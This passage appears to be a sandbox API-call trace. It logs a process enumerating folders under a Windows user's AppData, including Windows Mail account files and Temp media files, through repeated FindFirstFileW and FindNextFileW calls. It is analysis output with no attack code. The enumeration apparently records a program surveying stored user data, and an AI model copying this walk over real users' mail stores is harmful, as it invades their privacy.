ftLastWriteTime.dwLowDateTime=0x961fc18b, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="USRCLA~2.REG")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x961fc18b, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsrClass.dat{0f6d7aa7-f51a-11df-ae0e-001d09f21116}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="USRCLA~1.REG")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796e47d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d26e3cf, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WER", cAlternateFileName="")) returned 1 [0208.180] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796e47d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d26e3cf, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WER", cAlternateFileName="")) returned 0 [0208.180] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.180] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0208.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.181] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live", lpFilePart=0x0) returned 0x37 [0208.181] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.227] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8cddad0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8d03c30, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8d03c30, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.228] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d03c30, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf52e20f0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf52e20f0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bici", cAlternateFileName="")) returned 1 [0208.228] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d03c30, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf52e20f0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf52e20f0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bici", cAlternateFileName="")) returned 0 [0208.228] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.228] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0208.228] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.228] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail", lpFilePart=0x0) returned 0x37 [0208.229] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.287] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7d4ee530, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d4ee530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.287] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf657b4d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ae8cf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ae8cf0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67b6975, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796be670, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf303882f, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79ac2b90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ac2b90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a9ca30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a9ca30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a768d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a768d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2b29966, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2027392, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2216575, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a50770, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a50770, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf67dcad6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x0, dwReserved1=0x0, cFileName="oeold.xml", cAlternateFileName="")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796be670, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79ba73d0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf690d5d8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7d53a7f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x79a044b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2e234eb, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 1 [0208.288] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.288] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.290] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0208.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.290] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0208.290] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.291] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.291] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf928f5c4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.0", cAlternateFileName="")) returned 1 [0208.291] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79a044b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf928f5c4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="12.0", cAlternateFileName="")) returned 0 [0208.291] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.292] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x38ea3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0208.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef20) returned 1 [0208.292] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x38ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0208.292] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x38ecd0 | out: lpFindFileData=0x38ecd0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.293] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.293] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0208.293] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x0, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0208.293] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ecd8 | out: lpFindFileData=0x38ecd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.293] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ec90) returned 1 [0208.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38eef0) returned 1 [0208.294] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x38ead0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0208.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb4) returned 1 [0208.294] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x38ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0208.294] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x38ed64 | out: lpFindFileData=0x38ed64*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xcfe07360, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.294] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xcfe07360, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf7fb4b0, ftCreationTime.dwHighDateTime=0x1d7e660, ftLastAccessTime.dwLowDateTime=0xf428ad0, ftLastAccessTime.dwHighDateTime=0x1d7e72e, ftLastWriteTime.dwLowDateTime=0xf428ad0, ftLastWriteTime.dwHighDateTime=0x1d7e72e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aK-0EL44Cni3.mp4", cAlternateFileName="0AK-0E~1.MP4")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfef67c30, ftCreationTime.dwHighDateTime=0x1d7e1ac, ftLastAccessTime.dwLowDateTime=0xaa3f7270, ftLastAccessTime.dwHighDateTime=0x1d7e63c, ftLastWriteTime.dwLowDateTime=0xaa3f7270, ftLastWriteTime.dwHighDateTime=0x1d7e63c, nFileSizeHigh=0x0, nFileSizeLow=0x13e75, dwReserved0=0x0, dwReserved1=0x0, cFileName="0KOFCT.avi", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x906a11c0, ftCreationTime.dwHighDateTime=0x1d7e2fe, ftLastAccessTime.dwLowDateTime=0x96d7b060, ftLastAccessTime.dwHighDateTime=0x1d7e657, ftLastWriteTime.dwLowDateTime=0x96d7b060, ftLastWriteTime.dwHighDateTime=0x1d7e657, nFileSizeHigh=0x0, nFileSizeLow=0x11e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="41ec3YG6.m4a", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd48a6710, ftCreationTime.dwHighDateTime=0x1d7e619, ftLastAccessTime.dwLowDateTime=0xd40c3c10, ftLastAccessTime.dwHighDateTime=0x1d7e73a, ftLastWriteTime.dwLowDateTime=0xd40c3c10, 